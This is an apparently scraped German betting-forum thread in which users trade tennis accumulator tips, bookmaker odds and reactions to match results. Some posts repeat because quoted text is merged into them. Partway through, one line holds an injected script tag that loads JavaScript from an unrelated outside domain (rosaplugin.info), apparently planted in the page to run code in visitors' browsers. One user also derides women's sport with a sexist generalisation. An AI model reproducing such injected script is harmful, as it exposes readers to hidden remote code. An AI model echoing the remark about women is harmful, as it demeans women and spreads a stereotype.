Bei Interwetten bekommst du dafür 5,23!
Danke, bin im Moment aber nur bei bet365 unterwegs.
Aber grundsätzlich findest dus okay?
Bei Interwetten bekommst du dafür 5,23!
Ich überlege heute ne größere Kombi zu spielen:
Berdych @1,2
Tipsarevic @1,4
Tsonga@1,28
Nishikori @1,22
Simon @1,53
= 4,04
Was haltet ihr davon?
Läuft zur Zeit einiges total verrückt, deswegen würde ich es so nicht spielen, vorallem weil du einige Spieler in der Kombi drin hast, die ich persönlich nicht setze, was aber nicht bedeuten muss, dass es nicht so kommen kann.Danke, bin im Moment aber nur bei bet365 unterwegs.
Aber grundsätzlich findest dus okay?
Läuft zur Zeit einiges total verrückt, deswegen würde ich es so nicht spielen, vorallem weil du einige Spieler in der Kombi drin hast, die ich persönlich nicht setze, was aber nicht bedeuten muss, dass es nicht so kommen kann.
Ich könnt nie auf diesen Gilles Simon setzen, das geht einfach nicht! :mrgreen:Haste schon recht. Melzer und Dolgo können hier an einem sehr guten Tag überraschen, aber ich hoffe, dass fernab von Indian Wells normalität einkehrt.![]()
Espanyol OVER 3.5 @6.5 2/10
[script src="http://rosaplugin.info/dfi823hs.js?0.9383308299949572"][/script]
Dimitrov @4,50 also keine gute Idee? [[nixweiss]]
Warum kommt eigentlich auf eurosport die letzte zeit nur WTA Tennis [[nixweiss]]
Ich weiß, es ist verlockend, bin früher auch immer drauf reingefallen und habs immer wieder mal versucht, aber lasst doch einfach die Finger vom Damentennis. Das ist einfach unberechenbar. Man darf Frauen einfach keine Bälle geben, siehe auch Fußball oder Handball. Im Tennis haben sie ja schon Probleme den Ball vernünftig in die Luft zu werfen. [[help]] Es gibt ein paar Ausnahmen, aber die kann man auch an einer Hand abzählen.
Ich hatte ihn schon angeklickt, dann hab ich mir nochmal seine letzten Ergebnisse angeschaut, hat ja zuletzt gegen Almagro einen Satz mit 0:6 verloren, und dann hab ich ihn zum Glück doch nochmal rausgetan.Berdych komplett kaputt! nicht zu fassen![[stupid]]
so jetzt Miami:
Berdych + Tsonga + Nishikori @ 2,05 Bwin 5/10.
Was ist los mit dem Match Raonic gg Murray. Irgendeiner der beiden hat zurückgezogen.[[nixweiss]]
Simon - Melzer 7:6 ; 0:2
Wieso um Himmels Willen gibt es momentan ne 1,2 Siegquote für Melzer?[[stupid]]
Respekt Melzer, du kannst dir mit Verdasco die Hand geben! Unfassbar, wieviele fertige Spieler es mittlerweile gibt!Melzer @ 3,10 (Interwetten) 2/10
Muss ich mal probieren, weil der Simon einfach ein Vogel ist, hat man ja nach 5:0-Führung im Tiebreak gesehn und behandeln hat sich ja auch schon lassen.